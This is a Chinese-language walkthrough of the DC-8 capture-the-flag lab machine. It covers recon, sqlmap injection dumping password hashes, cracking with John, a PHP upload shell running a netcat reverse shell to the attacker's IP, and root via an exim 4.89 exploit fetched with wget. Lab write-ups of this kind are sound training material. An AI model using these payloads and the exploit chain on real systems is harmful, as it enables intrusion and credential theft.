DC-8靶机

查看靶机Ip

arp-scan -l  

在这里插入图片描述

靶机:192.168.149.155
主机:192.168.149.154

扫描端口

nmap -sS -A 192.168.149.155 -p-

在这里插入图片描述

dirb http://192.168.149.155

在这里插入图片描述

登录网站

image-20230814222050519

在主页随便点击之后发现 ?nid=1 的传参,直接上sqlmap测试是否存在常规的sql注入

在这里插入图片描述

sqlmap的使用

sqlmap -u "http://192.168.149.155/?nid=*"  #测试是否崔在SQL注入

在这里插入图片描述

sqlmap -u "http://192.168.149.155/?nid=*" --is-db #测试当前注入权限是否是最高权限

image-20230815214315355

sqlmap -u "http://192.168.149.155/?nid=*" --current-use #查看当前用户

dbuser@localhost

image-20230815214439070

sqlmap -u "http://192.168.149.155/?nid=*" --current-db #查看当前数据库

image-20230815214545799

sqlmap -u "http://192.168.149.155/?nid=*" --tables -D "d7db" #查看d7db(当前数据库)下的所有表名

image-20230815214746399

sqlmap -u "http://192.168.149.155/?nid=*" --dump -C "uid,name,pass,mail,login" -T "users" -D "d7db"

#查看选定字段(uid、name、pass、mail、login)中的所有数据

image-20230815214826668

 1   admin   | $S$D2tRcYRyqVFNSc0NvYUrYeQbLQg5koMKtihYTIDC9QQqJi3ICg5z | dcau-user@outlook.com 
 2   |john    | $S$DqupvJbxVmqjr6cYePnx2A891ln7lsuku/3if/oRVZJaz5mKC2vF | john@blahsdfsfd.org   

密码解密

image-20230815215113247

使用John解密

john  pass.txt

turtle

在这里插入图片描述

登录网站

john   turtle

image-20230815220203048

image-20230815220123998

发现这里可以上传

image-20230815220559648

上传shell

<?php 
system("nc -e /bin/bash 192.168.149.154 4444"); 
?>

开启监听

image-20230815220922927

image-20230815221813019

image-20230815221736967

image-20230815221823159

提权

交互

image-20230815221915708

查看是否存在suid提权

find / -perm -4000 -type f 2>/dev/null

image-20230815222019283

查看exim4命令版本

exim4 --version

Exim version 4.89

image-20230815222211256

在漏洞库里面寻找可利用的漏洞

searchsploit exim 

image-20230815222356568

将文件复制到桌面
cp /usr/share/exploitdb/exploits/linux/local/46996.sh 46996.sh

image-20230815222914909

开启服务,下载到靶机
kali:python2 -m SimpleHTTPServer 80
wget http://192.168.149.154:80/46996.sh

image-20230815223451864

image-20230815223433774

执行脚本
./46996.sh -m netcat

image-20230815223726797

image-20230815224056274

  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 1
    评论
评论 1
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值